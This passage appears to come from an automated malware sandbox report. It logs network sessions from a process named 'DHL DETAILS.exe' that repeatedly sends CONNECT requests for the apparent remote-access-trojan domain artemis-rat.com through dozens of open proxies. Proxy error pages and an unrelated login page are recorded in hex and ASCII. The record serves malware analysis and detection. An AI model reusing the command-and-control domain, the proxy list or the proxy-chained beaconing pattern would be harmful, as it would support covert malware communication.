6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
Mar 9, 2024 13:14:14.629487991 CET	1286	IN	Data Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
Mar 9, 2024 13:14:14.629636049 CET	1286	IN	Data Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
Mar 9, 2024 13:14:14.629762888 CET	1286	IN	Data Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
Mar 9, 2024 13:14:14.629801989 CET	298	IN	Data Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69 Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
Mar 9, 2024 13:14:14.633107901 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 95 b0 7d 9c aa 21 c0 e4 73 b9 58 52 3e f7 1e e5 b4 60 86 e4 1d 22 64 76 61 d7 a3 28 b6 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR}!sXR>`"dva(*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:14.988686085 CET	494	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:14 GMT Server: Apache/2.4.56 (Ubuntu) Content-Length: 312 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
462	192.168.2.5	51325	124.163.236.54	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.914513111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.364940882 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
463	192.168.2.5	51465	64.227.106.157	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.183240891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.354180098 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
464	192.168.2.5	51444	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.183671951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
465	192.168.2.5	50391	72.195.34.59	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.183753967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
466	192.168.2.5	50314	103.121.39.158	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.208842039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
467	192.168.2.5	50446	70.166.167.55	57745	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.218822956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
468	192.168.2.5	51389	103.190.54.141	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.219269037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
469	192.168.2.5	51420	39.108.227.108	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.220566988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.561958075 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
470	192.168.2.5	51452	20.210.113.32	8123	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.223321915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.490892887 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
471	192.168.2.5	51436	193.239.56.84	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.223458052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
472	192.168.2.5	51518	104.19.233.117	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.226155043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.380947113 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
473	192.168.2.5	51469	72.49.49.11	31034	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.228106976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
474	192.168.2.5	50581	24.249.199.12	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.228197098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
475	192.168.2.5	51474	147.75.34.86	10010	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.228552103 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:14.528132915 CET	65	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Zscaler/6.3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
476	192.168.2.5	50663	45.61.188.134	44499	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.228744984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.223964930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
477	192.168.2.5	50540	152.70.244.240	16238	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.229614973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
478	192.168.2.5	51455	45.117.179.240	8520	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.229677916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.973783970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.130429983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333506107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.723907948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.083048105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.442981005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
479	192.168.2.5	51473	20.206.106.192	8123	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.229716063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.551933050 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
480	192.168.2.5	51528	107.181.168.145	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.231121063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
481	192.168.2.5	51470	119.3.215.41	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
